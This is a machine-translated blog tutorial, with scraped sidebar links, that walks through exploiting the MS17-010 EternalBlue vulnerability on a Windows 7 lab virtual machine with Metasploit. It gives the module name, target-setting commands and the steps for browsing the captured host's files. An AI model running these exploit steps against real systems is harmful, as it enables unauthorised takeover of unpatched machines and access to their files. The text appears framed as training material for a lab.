当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
2020-11-06 01:17:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Win7 A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 utilize Metasploit(msf)*** The framework performs on the target host ***, As shown in the figure below .
step 1: start-up Metasploit(msf)*** frame , As shown in the figure below .
command :msfconsole
step 2:Metasploit(msf)*** Framework started successfully , As shown in the figure below .
step 3: Search vulnerability , As shown in the figure below .
command :search Hole number
Example :search ms17-010
step 4: Retrieve the exploit module of the vulnerability, as shown in the figure below .
step 5: Select the corresponding exploit module and use , As shown in the figure below .
command :use Exploit module name
Example :use exploit/windows/smb/ms17_010_eternalblue
step 6: Check the parameters that need to be set for the vulnerability module used , As shown in the figure below ..
command :show option
step 7: Set up *** Parameters , As shown in the figure below .
command :set rhosts Victim host IP
Example :set rhosts 192.168.78.160
step 8: Check whether the corresponding parameters are set successfully , As shown in the figure below .
command :show options
step 9: Run the exploit module , As shown in the figure below .
command :run
step 10: As shown in the figure below , Successfully captured the target host
Tips :ETERNALBLUE overwrite completed successfully!
3.2 After entering *** Stage , utilize DOS Command control target host , As shown in the figure below .
step 1: Get into Windows Systematic cmd window , As shown in the figure below .
step 2: Use the command to view the folder information of the victim's host , As shown in the figure below .
command :dir
Switch folder directory :cd Folder name
Toggle character :cd The name of the drive
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- Python自动化测试学习哪些知识?
- 业内首发车道级导航背后——详解高精定位技术演进与场景应用
- (1) ASP.NET Introduction to core3.1 Ocelot
- 数字城市响应相关国家政策大力发展数字孪生平台的建设
- 使用 Iceberg on Kubernetes 打造新一代云原生数据湖
- Every day we say we need to do performance optimization. What are we optimizing?
- Vue 3 responsive Foundation
- 如果前端不使用SPA又能怎样?- Hacker News
- 钻石标准--Diamond Standard
- 做外包真的很难,身为外包的我也无奈叹息。
猜你喜欢
Want to do read-write separation, give you some small experience
嘘!异步事件这样用真的好么?
在大规模 Kubernetes 集群上实现高 SLO 的方法
How do the general bottom buried points do?
Tool class under JUC package, its name is locksupport! Did you make it?
drf JWT認證模組與自定製
钻石标准--Diamond Standard
Working principle of gradient descent algorithm in machine learning
怎么理解Python迭代器与生成器?
PHPSHE 短信插件说明
随机推荐
PLC模拟量输入和数字量输入是什么
怎么理解Python迭代器与生成器?
Cos start source code and creator
在大规模 Kubernetes 集群上实现高 SLO 的方法
Want to do read-write separation, give you some small experience
CCR炒币机器人:“比特币”数字货币的大佬,你不得不了解的知识
Asp.Net Core learning notes: Introduction
做外包真的很难,身为外包的我也无奈叹息。
Top 10 best big data analysis tools in 2020
DevOps是什么
Using consult to realize service discovery: instance ID customization
数字城市响应相关国家政策大力发展数字孪生平台的建设
直播预告 | 微服务架构学习系列直播第三期
How long does it take you to work out an object-oriented programming interview question from Ali school?
幽默:黑客式编程其实类似机器学习!
Wiremock: a powerful tool for API testing
[C#] (原創)一步一步教你自定義控制元件——04,ProgressBar(進度條)
Use of vuepress
WeihanLi.Npoi 1.11.0/1.12.0 Release Notes
微服務 - 如何解決鏈路追蹤問題